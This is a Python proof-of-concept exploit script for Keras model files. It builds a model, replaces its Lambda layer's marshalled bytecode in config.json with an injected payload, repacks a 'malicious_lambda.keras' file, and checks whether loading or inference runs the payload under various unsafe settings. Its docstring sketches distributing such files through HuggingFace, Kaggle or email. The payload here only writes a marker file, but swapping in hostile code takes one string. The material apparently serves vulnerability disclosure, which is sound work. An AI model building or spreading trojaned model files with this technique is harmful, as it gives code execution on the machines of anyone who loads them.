#!/usr/bin/env python3
"""
Keras .keras Lambda Layer - Arbitrary Code Execution PoC
VULNERABILITY:
.keras model files are ZIP archives containing config.json. Lambda layers
store base64-encoded marshal'd Python bytecode in config.json under the
"function" -> "config" -> "code" key. When a model is loaded with
safe_mode=False (or after calling tf.keras.config.enable_unsafe_deserialization()),
this bytecode is unmarshalled and executed - enabling arbitrary code execution
from a crafted model file.
IMPACT:
Any user who loads an untrusted .keras file with safe_mode=False gets arbitrary
code execution. Many official tutorials and StackOverflow answers recommend
safe_mode=False to load models with custom layers. HuggingFace hosts thousands
of .keras files that could be replaced with malicious versions.
ATTACK VECTOR:
1. Attacker creates a legitimate-looking .keras model
2. Attacker replaces Lambda layer bytecode with malicious payload
3. Victim downloads model from HuggingFace, Kaggle, or email
4. Victim loads with safe_mode=False -> code executes silently
AFFECTED:
- keras >= 3.0 (all versions using .keras format)
- tensorflow >= 2.16 (ships keras 3.x)
TESTED: TensorFlow 2.20.0, Keras 3.13.2, Python 3.12
Usage:
python3 poc_keras_lambda_ace.py
"""
import os
import sys
import json
import zipfile
import marshal
import base64
import types
import tempfile
import shutil
# Lower TensorFlow's native log verbosity. This is set at module level, ahead of
# the function-local `import tensorflow` statements, so it is already in the
# environment when TensorFlow is first imported.
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "3"
# Path the demo payload writes to; every test deletes it first and then checks
# for its presence to decide whether the embedded code ran.
MARKER_FILE = "/tmp/keras_ace_marker.txt"
# Text the demo payload writes into MARKER_FILE.
PAYLOAD_MSG = "KERAS_LAMBDA_ACE_CONFIRMED"
def create_malicious_keras_model(output_path):
    """Write a .keras archive whose Lambda layer bytecode has been swapped.

    A small Sequential model containing one Lambda layer is saved to a
    scratch directory, its archive members are read back into memory, the
    Lambda layer's serialized code in ``config.json`` is replaced with the
    demo payload (which writes ``PAYLOAD_MSG`` to ``MARKER_FILE`` and then
    returns its input unchanged), and the archive is re-written to
    ``output_path``.

    Args:
        output_path: Destination path of the modified .keras file.

    Raises:
        SystemExit: With status 1 when no Lambda layer entry is found in
            ``config.json``.
    """
    import tensorflow as tf

    print("[*] Step 1: Building legitimate model with Lambda layer...")
    model = tf.keras.Sequential([
        tf.keras.layers.Input(shape=(5,)),
        tf.keras.layers.Dense(10, name="dense_1"),
        tf.keras.layers.Lambda(lambda x: x * 2, name="lambda_layer"),
        tf.keras.layers.Dense(1, name="output"),
    ])
    model.compile(optimizer="adam", loss="mse")

    # The scratch directory is only needed until the archive has been read
    # into memory. The context manager removes it on every exit path,
    # including exceptions raised while saving or reading the archive.
    with tempfile.TemporaryDirectory(prefix="keras_poc_") as tmp_dir:
        legit_path = os.path.join(tmp_dir, "legit.keras")
        model.save(legit_path)
        print(" Saved legitimate model: {} ({} bytes)".format(legit_path, os.path.getsize(legit_path)))

        print("[*] Step 2: Extracting .keras ZIP and injecting malicious bytecode...")
        with zipfile.ZipFile(legit_path, "r") as zf:
            archive_files = {name: zf.read(name) for name in zf.namelist()}

    config = json.loads(archive_files["config.json"])

    evil_source = "lambda x: (__import__('builtins').open('{}', 'w').write('{}\\n'), x)[-1]".format(
        MARKER_FILE, PAYLOAD_MSG
    )
    print(" Payload: write '{}' to {}".format(PAYLOAD_MSG, MARKER_FILE))

    # Compiling the lambda expression in "eval" mode yields an outer code
    # object; the lambda's own code object is stored among its constants.
    evil_expr = compile(evil_source, "<payload>", "eval")
    lambda_code = [c for c in evil_expr.co_consts if isinstance(c, types.CodeType)][0]
    # NOTE(review): the trailing newline presumably mirrors the encoding Keras
    # itself writes for this field - confirm against the Keras serializer.
    evil_b64 = base64.b64encode(marshal.dumps(lambda_code)).decode() + "\n"
    print(" Encoded bytecode: {} chars".format(len(evil_b64)))

    def inject_into_lambda(obj):
        """Depth-first search of the config; patch the first Lambda found.

        Returns True as soon as one Lambda entry has been patched, False if
        none was found under ``obj``.
        """
        if isinstance(obj, dict):
            if obj.get("class_name") == "Lambda" and "config" in obj:
                func = obj["config"].get("function", {})
                if isinstance(func, dict) and "config" in func:
                    func["config"]["code"] = evil_b64
                    print(" Injected payload into Lambda layer config")
                    return True
            for v in obj.values():
                if isinstance(v, (dict, list)) and inject_into_lambda(v):
                    return True
        elif isinstance(obj, list):
            for v in obj:
                if inject_into_lambda(v):
                    return True
        return False

    if not inject_into_lambda(config):
        print(" ERROR: Could not find Lambda layer in config.json")
        sys.exit(1)

    print("[*] Step 3: Repacking .keras file with malicious config...")
    archive_files["config.json"] = json.dumps(config).encode()
    with zipfile.ZipFile(output_path, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in archive_files.items():
            zf.writestr(name, data)
    print(" Malicious model: {} ({} bytes)".format(output_path, os.path.getsize(output_path)))
def test_safe_mode_true(model_path):
    """Load ``model_path`` with default settings and report marker creation.

    Returns:
        True only when the load succeeds and ``MARKER_FILE`` exists
        afterwards; False when loading raises or no marker was written.
    """
    import tensorflow as tf

    print("\n[*] Test A: Loading with safe_mode=True (default)...")

    # Drop any marker from an earlier run so a hit is attributable to this load.
    stale_marker = os.path.exists(MARKER_FILE)
    if stale_marker:
        os.remove(MARKER_FILE)

    try:
        tf.keras.models.load_model(model_path)
        print(" Model loaded (unexpected)")
        executed = os.path.exists(MARKER_FILE)
    except Exception as exc:
        reason = str(exc)[:150]
        print(" Blocked as expected: {}".format(reason))
        executed = False
    return executed
def test_safe_mode_false(model_path):
    """Load ``model_path`` with ``safe_mode=False`` and look for the marker.

    The marker is checked right after loading and, if absent, again after a
    single ``predict`` call on a random (1, 5) input.

    Returns:
        True when ``MARKER_FILE`` appears at either stage; False otherwise,
        including when loading or inference raises.
    """
    import tensorflow as tf
    import numpy as np

    def announce_marker(template):
        """Print the marker contents via ``template`` if the marker exists."""
        if not os.path.exists(MARKER_FILE):
            return False
        with open(MARKER_FILE) as handle:
            text = handle.read().strip()
        print(template.format(text))
        return True

    print("\n[*] Test B: Loading with safe_mode=False...")

    # Start from a clean slate so the marker can only come from this test.
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)

    try:
        model = tf.keras.models.load_model(model_path, safe_mode=False)
        print(" Model loaded with safe_mode=False")
        if announce_marker(" >>> ACE CONFIRMED ON LOAD: marker = '{}'"):
            return True

        print(" No execution on load. Running inference...")
        sample = np.random.randn(1, 5)
        prediction = model.predict(sample, verbose=0)
        print(" Inference result: {}".format(prediction))
        if announce_marker(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'"):
            return True

        print(" No ACE triggered")
        return False
    except Exception as exc:
        print(" Error: {}".format(str(exc)[:300]))
        return False
def test_enable_unsafe_deserialization(model_path):
    """Load ``model_path`` after ``enable_unsafe_deserialization()``.

    The marker is checked right after loading and, if absent, again after a
    single ``predict`` call on a random (1, 5) input.

    Returns:
        True when ``MARKER_FILE`` appears at either stage; False otherwise,
        including when loading or inference raises.
    """
    import tensorflow as tf
    import numpy as np

    def announce_marker(template):
        """Print the marker contents via ``template`` if the marker exists."""
        if not os.path.exists(MARKER_FILE):
            return False
        with open(MARKER_FILE) as handle:
            text = handle.read().strip()
        print(template.format(text))
        return True

    print("\n[*] Test C: Loading with enable_unsafe_deserialization()...")

    # Start from a clean slate so the marker can only come from this test.
    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)

    try:
        # NOTE(review): this setting is not restored afterwards; presumably it
        # stays active for the rest of the process - confirm before reordering
        # the tests or reusing this function elsewhere.
        tf.keras.config.enable_unsafe_deserialization()
        model = tf.keras.models.load_model(model_path)
        print(" Model loaded with enable_unsafe_deserialization")
        if announce_marker(" >>> ACE CONFIRMED ON LOAD: marker = '{}'"):
            return True

        print(" No execution on load. Running inference...")
        sample = np.random.randn(1, 5)
        model.predict(sample, verbose=0)
        if announce_marker(" >>> ACE CONFIRMED ON INFERENCE: marker = '{}'"):
            return True

        print(" No ACE triggered")
        return False
    except Exception as exc:
        print(" Error: {}".format(str(exc)[:300]))
        return False
def main():
    """Build the modified model, run the three load tests, print a summary.

    The model is written next to this script as ``malicious_lambda.keras``.
    Any existing ``MARKER_FILE`` is removed before the run starts.
    """
    banner = "=" * 70
    print(banner)
    print("Keras .keras Lambda Layer - Arbitrary Code Execution PoC")
    print(banner)

    here = os.path.dirname(os.path.abspath(__file__))
    malicious_model = os.path.join(here, "malicious_lambda.keras")

    if os.path.exists(MARKER_FILE):
        os.remove(MARKER_FILE)

    create_malicious_keras_model(malicious_model)

    # Order matters: the default-settings test runs first, and the test that
    # calls enable_unsafe_deserialization() runs last.
    ace_safe = test_safe_mode_true(malicious_model)
    ace_unsafe = test_safe_mode_false(malicious_model)
    ace_global = test_enable_unsafe_deserialization(malicious_model)

    safe_label = "ACE!" if ace_safe else "Blocked (correct)"
    unsafe_label = "ACE!" if ace_unsafe else "No ACE"
    global_label = "ACE!" if ace_global else "No ACE"

    print("\n" + banner)
    print("RESULTS:")
    print(" safe_mode=True (default): {}".format(safe_label))
    print(" safe_mode=False: {}".format(unsafe_label))
    print(" enable_unsafe_deserialization(): {}".format(global_label))
    print()

    if not (ace_unsafe or ace_global):
        print("No ACE triggered. Check TensorFlow/Keras version.")
    else:
        print("VULNERABILITY CONFIRMED: .keras Lambda bytecode enables arbitrary")
        print("code execution when loaded with safe_mode=False or after calling")
        print("enable_unsafe_deserialization().")
        print()
        print("Marker file: {}".format(MARKER_FILE))
        if os.path.exists(MARKER_FILE):
            with open(MARKER_FILE) as handle:
                print("Contents: {}".format(handle.read().strip()))
        print("\nMalicious model saved to: {}".format(malicious_model))
    print(banner)
# Run the demonstration only when executed as a script, not when imported.
if __name__ == "__main__":
    main()
|